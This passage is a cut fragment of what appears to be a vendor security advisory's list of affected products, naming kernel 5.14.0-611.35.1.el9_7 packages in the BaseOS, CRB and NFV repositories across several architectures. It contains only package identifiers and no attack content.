"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"CRB-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
